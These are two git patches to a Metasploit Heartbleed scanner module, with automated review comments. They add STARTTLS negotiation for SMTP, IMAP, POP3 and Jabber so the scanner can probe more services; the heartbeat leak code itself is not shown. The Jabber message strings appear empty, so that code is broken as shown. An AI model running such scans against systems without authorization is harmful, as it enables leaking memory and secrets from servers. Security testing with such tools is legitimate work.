From 9c053a5b91dab693af414997c69062379909f879 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Tue, 8 Apr 2014 21:56:05 +0200
Subject: [PATCH 1/2] Added additional protocols
---
 .../scanner/ssl/openssl_heartbleed.rb | 85 ++++++++++++++++---
 1 file changed, 75 insertions(+), 10 deletions(-)
diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
index d02d727ce4..3ff099c122 100644
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
 register_options( [ Opt::RPORT(443),
- OptBool.new('STARTTLS', [ true, "Use STARTTLS", false])
+ OptEnum.new('PROTOCOL', [true, 'Protocol to use with SSL', 'WEB', [ 'WEB', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]])
 ], self.class)
 end
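Review bot: The option description on the `+ OptEnum.new('PROTOCOL', ...)` line does not tell the user that every value except WEB negotiates STARTTLS against a plaintext service, while the `Opt::RPORT(443)` default on the context line above stays tuned for direct TLS; with SMTP, IMAP, POP3 or JABBER selected and RPORT untouched the scan talks to the wrong port and reports a STARTTLS failure rather than a meaningful result. Say so in the description, e.g. `'Protocol to use with SSL (WEB connects to a TLS port; other values negotiate STARTTLS on the plaintext service port, so set RPORT accordingly)'`.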
@@ -106,27 +106,92 @@ class Metasploit3 < Msf::Auxiliary
 "#{rhost}:#{rport}"
 end
- def start_ttls
+ def tls_smtp
 sock.get_once
- sock.put("EHLO starttlstest\n")
+ sock.put("EHLO #{rand_text_alpha(10)}\n")
 res = sock.get_once
- unless res and res =~ /STARTTLS/
+ unless res and res =~ /STARTTLS/i
 return nil
 end
 sock.put("STARTTLS\n")
 sock.get_once
 end
+ def tls_imap
+ sock.get_once
+ sock.put("a001 CAPABILITY\r\n")
+ res = sock.get_once
+ unless res and res =~ /STARTTLS/i
+ return nil
+ end
+ sock.put("a002 STARTTLS\r\n")
+ sock.get_once
+ end
+
+ def tls_pop3
+ sock.get_once
+ sock.put("CAPA\r\n")
+ res = sock.get_once
+ if !res or res =~ /^-/
+ return nil
+ end
+ sock.put("STLS\r\n")
+ res = sock.get_once
+ if !res or res =~ /^-/
+ return nil
+ end
+ end
+
+ def tls_jabber
+ msg = ""
+ sock.put(msg)
+ res = sock.get_once
+ return nil if res.nil? # SSL not supported
+ return nil if res =~ /stream:error/ or res !~ /starttls/i
+ msg = ""
+ sock.put(msg)
+ sock.get_once
+ end
+
 def run_host(ip)
 connect
- if datastore['STARTTLS']
- print_status("#{peer} - Trying to STARTTLS...")
- res = start_ttls
- if res.nil?
- print_error("#{peer} - STARTTLS failed...")
+ case datastore['PROTOCOL']
+ when "WEB"
+ # no STARTTLS needed
+ when "SMTP"
+ print_status("Trying to start SSL via SMTP")
+ res = tls_smtp
+ if res.nil?
+ print_error("#{peer} - STARTTLS failed...")
+ return
+ end
+ when "IMAP"
+ print_status("Trying to start SSL via IMAP")
+ res = tls_imap
+ if res.nil?
+ print_error("#{peer} - STARTTLS failed...")
+ return
+ end
+ when "JABBER"
+ print_status("Trying to start SSL via JABBER")
+ res = tls_jabber
+ if res.nil?
+ print_error("#{peer} - STARTTLS failed...")
+ return
+ end
+ when "POP3"
+ print_status("Trying to start SSL via POP3")
+ res = tls_pop3
+ if res.nil?
+ print_error("#{peer} - STARTTLS failed...")
+ return
+ end
+ else
+ print_error("Unknown protocol #{datastore['PROTOCOL']}")
 return
- end
 end
 print_status("#{peer} - Sending Client Hello...")
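Review bot: `tls_pop3` cannot report success — its final expression is the trailing `if !res or res =~ /^-/ ... end`, which evaluates to nil whenever the guard is not taken, so the `when "POP3"` branch in run_host always prints `STARTTLS failed...` and returns even after the STLS exchange went through; end the method with `res` (the server's STLS reply) after the second guard, the way tls_smtp and tls_imap return their last `sock.get_once`. The four `when` branches differ only in the method called and the label, and their `print_status` calls drop the `#{peer} - ` prefix every other message uses, so a protocol-to-method lookup with one shared error path is easier to keep consistent (sketched below; run_host continues past the end of the hunk). The `else` branch is unreachable for an OptEnum-validated value but is harmless as a guard.
```ruby
  def run_host(ip)
    connect

    proto = datastore['PROTOCOL']
    # Every protocol except WEB has to upgrade a plaintext session first.
    unless proto == 'WEB'
      starter = { 'SMTP' => :tls_smtp, 'IMAP' => :tls_imap,
                  'JABBER' => :tls_jabber, 'POP3' => :tls_pop3 }[proto]
      if starter.nil?
        print_error("#{peer} - Unknown protocol #{proto}")
        return
      end
      print_status("#{peer} - Trying to start SSL via #{proto}")
      if send(starter).nil?
        print_error("#{peer} - STARTTLS failed...")
        return
      end
    end
    # … unchanged: Client Hello and heartbeat handling …
```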
From 8c7debb81daa21cb7af9bbe0a5d60cdb83f7bc6c Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Tue, 8 Apr 2014 22:13:02 +0200
Subject: [PATCH 2/2] Added some comments and modified JABBER
---
 modules/auxiliary/scanner/ssl/openssl_heartbleed.rb | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)
diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
index 3ff099c122..b53e76c8e4 100644
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -107,6 +107,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 def tls_smtp
+ # https://tools.ietf.org/html/rfc3207
 sock.get_once
 sock.put("EHLO #{rand_text_alpha(10)}\n")
 res = sock.get_once
@@ -118,6 +119,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 def tls_imap
+ # http://tools.ietf.org/html/rfc2595
 sock.get_once
 sock.put("a001 CAPABILITY\r\n")
 res = sock.get_once
@@ -129,6 +131,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 def tls_pop3
+ # http://tools.ietf.org/html/rfc2595
 sock.get_once
 sock.put("CAPA\r\n")
 res = sock.get_once
@@ -143,9 +146,12 @@ class Metasploit3 < Msf::Auxiliary
 end
 def tls_jabber
- msg = ""
+ # http://xmpp.org/extensions/xep-0035.html
+ msg = ""
+ msg << ""
 sock.put(msg)
 res = sock.get_once
 return nil if res.nil? # SSL not supported